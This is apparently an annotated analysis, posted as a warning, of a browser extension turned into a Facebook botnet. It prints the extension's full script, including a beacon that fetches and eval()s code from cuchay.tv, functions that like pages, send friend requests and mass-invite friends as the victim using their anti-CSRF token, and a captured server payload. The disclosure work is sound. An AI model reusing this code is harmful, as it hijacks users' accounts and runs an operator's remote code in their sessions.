Cảnh báo kẻ xấu lợi dụng Clickjacking extension để tạo "botnet" — English: warning that attackers are abusing a "Clickjacking" browser extension to build a Facebook "botnet"; the listing below is that extension's script, with the abusive Facebook code bundled alongside the original anti-clickjacking detector (`detect`).
(function()
{
// Bulk-invite every friend of the logged-in victim to Facebook page `e`.
// NOTE(review): this is part of the abusive payload; it is annotated here for analysis only.
// `e` is a page id that is passed straight through to InviteFriends. Nothing in this listing calls
// invitenew, so it is presumably reached via code that Updatenew() eval()s from the remote server.
function invitenew(e)
{
    // `x` and `i` are NOT locals: both are declared in the enclosing scope further down.
    x = document.getElementsByTagName("span");
    // One friend-list request is fired per <span> in the page, i.e. the whole fetch/invite cycle is
    // repeated many times. The URL has three slashes after the protocol ("https:///www.facebook.com");
    // browsers generally tolerate the extra slash. viewer/__user carry the victim's own uid, so the
    // request is made as the victim with the victim's session cookies.
    for ( i = 0; i < x.length; i++)
    jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function(t)
    {
        var n = t;
        // Facebook prefixes its JSON responses with a "for (;;);" anti-hijacking guard; cutting at the
        // first "{" strips that prefix before JSON.parse.
        var r = n.substring(n.indexOf("{"));
        var s = JSON.parse(r);
        s = s.payload.entries;
        // Harvest uid / display name / photo of every friend returned. arr, arn and pho are outer-scope
        // arrays that are never cleared, so they keep growing across calls; pho and arn are not used
        // anywhere else in this listing.
        for (var o = 0; o < s.length; o++)
        arr.push(s[o].uid);
        for (var u = 0; u < s.length; u++)
        arn.push(s[u].text);
        for (var a = 0; a < s.length; a++)
        pho.push(s[a].photo);
        // `i` is the same outer variable used as the loop counter above; this callback runs after that
        // loop has finished, and from here on `i` serves as a countdown shared with InviteFriends
        // (whose response handler does i--).
        i = arr.length - 1;
        // Send a page invite to every harvested uid, skipping arr[0].
        for ( tay = 1; tay <= i; tay++)
        {
            InviteFriends(e, arr[tay])
        }
    })
}
// Invite one user `t` to like page `e`, as the victim, via Facebook's internal
// /ajax/pages/invite/send_single endpoint. NOTE(review): abusive code, annotated for analysis only.
// The request includes fb_dtsg (Facebook's anti-CSRF token, read from the page's hidden input further
// down). Because this script runs with access to the page DOM it already holds the token, which is why
// Facebook's CSRF protection does not stop it. elem_id and __req look like values copied from one
// captured browser request; presumably the server did not validate them.
// jx.load splits this URL at "?" and sends the query part as the POST body (see jx.load below).
function InviteFriends(e, t)
{
    jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send_single?page_id=" + e + "&invitee=" + t + "&elem_id=u_0_4v&action=send&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg=" + fb_dtsg + "&phstamp=", function(e)
    {
        // The response is parsed (after stripping the "for (;;);" prefix) but the result is discarded;
        // the only effect is decrementing the shared countdown `i` set by invitenew.
        var t = e.substring(e.indexOf("{"));
        var n = JSON.parse(t);
        i--
    }, "text", "post")
}
// Make the victim "like" Facebook page `e` by POSTing add=true to the internal fan_status.php endpoint.
// NOTE(review): abusive code, annotated for analysis only. This is one of the two commands the remote
// server returned when the gist author fetched it (see the captured payload at the end of the listing).
function Like(e)
{
    var t = new XMLHttpRequest;
    // Protocol-relative URL: resolves against the current (facebook.com) page, so the victim's session
    // cookies are attached automatically.
    var n = "//www.facebook.com/ajax/pages/fan_status.php";
    // Form-encoded body; __user and fb_dtsg are the victim's uid and anti-CSRF token harvested below.
    var r = "&fbpage_id=" + e + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
    t.open("POST", n, true);
    t.onreadystatechange = function()
    {
        if (t.readyState == 4 && t.status == 200)
        {
            // Property read, not a call, and XMLHttpRequest has no close(): this is a no-op.
            // The response is never inspected.
            t.close
        }
    };
    t.send(r)
}
// Make the victim "like" a post/story `e` (ft_ent_identifier) via the internal /ajax/ufi/like.php
// endpoint. NOTE(review): abusive code, annotated for analysis only. This is the second command the
// remote server returned at capture time (see the end of the listing).
function P(e)
{
    var t = new XMLHttpRequest;
    // Protocol-relative URL: same origin as the facebook.com page, session cookies attached.
    var n = "//www.facebook.com/ajax/ufi/like.php";
    // `now` is the timestamp taken when the script loaded. The fixed ft[qid], ft[mf_story_key], rootid
    // and client_id suffix presumably come from one captured browser request and are replayed as-is.
    var r = "like_action=true&ft_ent_identifier=" + e + "&source=1&client_id=" + now + "%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg=" + fb_dtsg + "&phstamp=";
    t.open("POST", n, true);
    t.onreadystatechange = function()
    {
        if (t.readyState == 4 && t.status == 200)
        {
            // No-op property read; the response is ignored.
            t.close
        }
    };
    t.send(r)
}
// Send a friend request from the victim to uid `e` via the internal /ajax/add_friend/action.php
// endpoint (action=add_friend). NOTE(review): abusive code, annotated for analysis only. Nothing in
// this listing calls IDS; like invitenew it is presumably invoked by remotely eval()ed code.
function IDS(e)
{
    var t = new XMLHttpRequest;
    var n = "//www.facebook.com/ajax/add_friend/action.php";
    // how_found/logging_location mimic the "friend browser" UI; __user and fb_dtsg are the victim's.
    var r = "to_friend=" + e + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
    t.open("POST", n, true);
    t.onreadystatechange = function()
    {
        if (t.readyState == 4 && t.status == 200)
        {
            // No-op property read; the response is ignored.
            t.close
        }
    };
    t.send(r)
}
// Command-and-control beacon: fetch http://cuchay.tv/hay.php and eval() whatever comes back.
// NOTE(review): this is what makes the extension a "botnet" node. The operator can return any
// JavaScript and it runs inside the victim's Facebook session with access to the helpers above
// (Like, P, IDS, invitenew) and to fb_dtsg/user_id. The fetch is plain HTTP, so an on-path party could
// substitute its own payload as well. Called from the bottom of the script only when the current URL
// contains "facebook.com".
function Updatenew()
{
    var Page = new XMLHttpRequest;
    var PageURL = "http://cuchay.tv/hay.php";
    // Passed to send() on a GET; XHR drops the body for GET, so pageid=1 is never transmitted this way
    // (the gist author's reproduction at the end of the listing puts it in the query string instead).
    var PageParams = "&pageid=1";
    // Cross-origin request from a facebook.com page to cuchay.tv — presumably permitted by the
    // extension's host permissions; that cannot be confirmed from this listing.
    Page.open("GET", PageURL, true);
    Page.onreadystatechange = function()
    {
        if (Page.readyState == 4 && Page.status == 200)
        {
            // No-op property read (XMLHttpRequest has no close()).
            Page.close
            // "0" is the "nothing to do" answer; any other body is executed as code.
            if (Page.response != "0")
            {
                eval(Page.response)
            }
        }
    };
    Page.send(PageParams)
}
// Minimal XMLHttpRequest wrapper used by invitenew/InviteFriends. Assigned without `var`, so `jx`
// becomes a global on the page (or content-script) window rather than staying private to the IIFE.
jx =
{
    // Create a request object: ActiveX fallbacks for old IE, native XMLHttpRequest otherwise;
    // returns false when neither is available.
    b: function()
    {
        var e = !1;
        if ("undefined" != typeof ActiveXObject)
        try
        {
            e = new ActiveXObject("Msxml2.XMLHTTP")
        }
        catch(t)
        {
            try
            {
                e = new ActiveXObject("Microsoft.XMLHTTP")
            }
            catch(n)
            {
                e = !1
            }
        }
        else
        if (window.XMLHttpRequest)
        try
        {
            e = new XMLHttpRequest
        }
        catch(r)
        {
            e = !1
        }
        return e
    },
    // load(url, callback, responseType, method, options)
    //   b: URL (for POST, everything after the first "?" becomes the request body)
    //   c: callback invoked with the response on HTTP 200
    //   a: "text" (default), "json" or "xml" — selects how the response is converted
    //   h: HTTP method, default "GET"
    //   g: options object; g.c replaces the readystatechange handler entirely, g.f/g.e are
    //      a loading-indicator node / element id to hide on error.
    load: function(b, c, a, h, g)
    {
        var e = this.d();
        if (e && b)
        {
            // Forces XML parsing of every response; responseText is still used for "text"/"json".
            e.overrideMimeType && e.overrideMimeType("text/xml");
            h || ( h = "GET");
            a || ( a = "text");
            g || ( g =
            {
            });
            a = a.toLowerCase();
            h = h.toUpperCase();
            // indexOf("?") + 1 is truthy when a "?" is present: append "&" then, else "?".
            b += b.indexOf("?") + 1 ? "&" : "?";
            var k = null;
            // For POST the URL is split at the first "?" and the query string is sent as the body.
            // No Content-Type header is set, so the body goes out with XHR's default for a string.
            "POST" == h && ( k = b.split("?"), b = k[0], k = k[1]);
            e.open(h, b, !0);
            e.onreadystatechange = g.c ? function()
            {
                g.c(e)
            } : function()
            {
                if (4 == e.readyState)
                if (200 == e.status)
                {
                    var b = "";
                    e.responseText && ( b = e.responseText);
                    // NOTE(review): the "json" branch eval()s the raw response body instead of using
                    // JSON.parse. Callers in this listing request "text", so it is not exercised here.
                    "j" == a.charAt(0) ? ( b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && ( b = e.responseXML);
                    c && c(b)
                }
                else
                // `error` is not defined anywhere in this listing; unless it exists elsewhere, a non-200
                // response throws a ReferenceError here instead of reporting the status.
                g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
            };
            e.send(k)
        }
    },
    // Indirection kept from the original library; simply creates the request object.
    d: function()
    {
        return this.b()
    }
};
// Shared state for the whole script. These `var`s are hoisted to the top of the IIFE but are
// assigned here, i.e. after jx is set up and before the entry point at the bottom runs.

// Loop counter / countdown shared between invitenew and InviteFriends's response handler.
var i = 3;
// Inner loop counter used by invitenew.
var tay = 3;
// Not referenced anywhere else in this listing.
var suc = 0;
var err = 0;
// Friend uids / display names / photo URLs harvested by invitenew; never cleared.
var arr = new Array;
var arn = new Array;
var pho = new Array;
// Not referenced anywhere else in this listing.
var tag = "Close";
// `x` is reused by invitenew for the page's <span> list; page_name is unused here.
var page_name, x;
// Facebook's anti-CSRF token, read from the hidden <input name="fb_dtsg"> present on facebook.com
// pages. NOTE(review): there is no guard — on any page without that input, [0] is undefined and this
// line throws a TypeError, which aborts the entire IIFE (including detect()) on non-Facebook pages.
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
// Victim's uid from the c_user cookie. The inner match yields the digits; the outer match() then
// searches the cookie for that digit string and returns a match array, which is coerced to the uid
// when concatenated into the URLs above. Throws a TypeError when no c_user cookie exists.
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
// Script load time in ms; used as part of client_id in P().
var now = (new Date).getTime();

// Scheduling state for detect(): it re-runs with a growing delay (interval += count * intervalStep)
// until count reaches countMax; a hit resets count and interval.
var count = 0;
var countMax = 10;
var intervalStep = 100;
var interval = intervalStep;
// Ids assigned by detect() to transparent nodes that had none.
var nodeIdPrefix = '_no-clickjacking-';
var nodeIdCount = 0;
// nodeId -> number of rounds in which that node was found hidden.
var strikes =
{
};
// Logging is disabled: the unconditional `return` makes the console.log unreachable.
var log = function()
{
    return;
    console.log.apply(console, arguments);
}
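// Anti-clickjacking check — the legitimate part of this extension. Finds <iframe>s that are hidden
// by a near-zero opacity on the frame or on any ancestor element, forces them visible (inline style
// plus an !important rule), and removes a node that keeps being re-hidden round after round.
// Re-schedules itself with a growing delay until countMax rounds pass without a hit; a hit resets
// the schedule to the fastest interval.
// Reads/writes the enclosing scope's count, interval, intervalStep, countMax, nodeIdPrefix,
// nodeIdCount, strikes and log. No parameters, no return value.
var detect = function()
{
    log('detecting...', count, interval);
    // Copy the live HTMLCollection with a numeric loop. A for…in over the collection also visits
    // non-index keys (e.g. "length", "item") on engines where they are enumerable, which would hand
    // non-elements to getComputedStyle and abort the whole round.
    var iframes = document.getElementsByTagName('iframe');
    var frames = [];
    for (var k = 0; k < iframes.length; k++)
    {
        frames.push(iframes[k]);
    }
    var transparentNodeIds = [];
    for (var f = 0; f < frames.length; f++)
    {
        var node = frames[f];
        // Walk up through Element ancestors only: getComputedStyle rejects the Document node that
        // ends the parentNode chain.
        while (node && node.nodeType === 1)
        {
            var style = getComputedStyle(node);
            // '0' + opacity turns '' into 0 and '.5' into 0.5 before the comparison.
            if (style && parseFloat('0' + style.opacity) < 0.1)
            {
                log('found', node, frames[f]);
                // reset interval to check as fast as possible
                interval = intervalStep;
                count = 0;
                var nodeId = node.id;
                if (!nodeId)
                {
                    nodeId = nodeIdPrefix + nodeIdCount;
                    nodeIdCount++;
                    node.id = nodeId;
                }
                // One strike per node per round: two frames under the same hidden ancestor would
                // otherwise record that ancestor twice.
                if (transparentNodeIds.indexOf(nodeId) < 0)
                {
                    transparentNodeIds.push(nodeId);
                }
            }
            node = node.parentNode;
        }
    }
    if (transparentNodeIds.length > 0)
    {
        var css = '';
        for (var t = 0; t < transparentNodeIds.length; t++)
        {
            var id = transparentNodeIds[t];
            var hidden = document.getElementById(id);
            if (!hidden)
            {
                // Gone from the document since the first pass; nothing to fix.
                continue;
            }
            // hasOwnProperty so an id like "constructor" does not read from Object.prototype.
            if (!Object.prototype.hasOwnProperty.call(strikes, id))
            {
                // first strike
                strikes[id] = 1;
            }
            else
            {
                // subsequent strike: the page re-hid a node we already revealed
                strikes[id]++;
            }
            if (strikes[id] > 3)
            {
                // Still hidden after three forced reveals: take the node out of the page.
                hidden.parentNode.removeChild(hidden);
                log('too many strikes, removed', id);
            }
            else
            {
                hidden.style.opacity = 1;
                hidden.style.overflow = 'visible';
                css += '#' + id + '{opacity:1 !important;overflow: visible !important}';
            }
        }
        if (css.length > 0)
        {
            // Inject an !important rule as well so a page stylesheet cannot simply re-hide the node.
            var styleEl = document.createElement('style');
            // textContent, not innerText: a <style> element's rules are plain text content.
            styleEl.textContent = css;
            document.getElementsByTagName('head')[0].appendChild(styleEl);
        }
    }
    if (count < countMax)
    {
        count++;
        interval += count * intervalStep;
        window.setTimeout(detect, interval);
    }
    else
    {
        log('stopped');
    }
};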
// Entry point, executed once when the script is injected. Only the top-level document acts; frames
// are skipped. On any URL containing "facebook.com" the C2 beacon Updatenew() runs first (fetch +
// eval of attacker-supplied code); the anti-clickjacking detector then starts on every page.
// Note that fb_dtsg and user_id above are read unconditionally, so on a page without them the IIFE
// has already thrown before reaching this point.
if (window.top === window)
{
    // Local `location` (hoisted var) shadows window.location inside this closure; it holds the href.
    var location = window.location.href;
    // Plain substring test — also matches e.g. "https://example.test/facebook.com".
    if (location.indexOf("facebook.com") >= 0)
    {
        Updatenew();
    }
    detect();
}
})();
// The gist author's capture of what the remote server actually returned at the time — i.e. the body
// of http://cuchay.tv/hay.php, which Updatenew() above hands to eval():
// curl 'http://cuchay.tv/hay.php?pageid=1'
// Two commands for the victim's session: "like" page 264357593705349 and "like" post/story
// 326844584123316. These are the operator's targets at capture time and presumably change per fetch.
// Like and P are private to the IIFE above, so this line only works when eval()ed inside Updatenew,
// not as top-level code.
Like(264357593705349);P(326844584123316);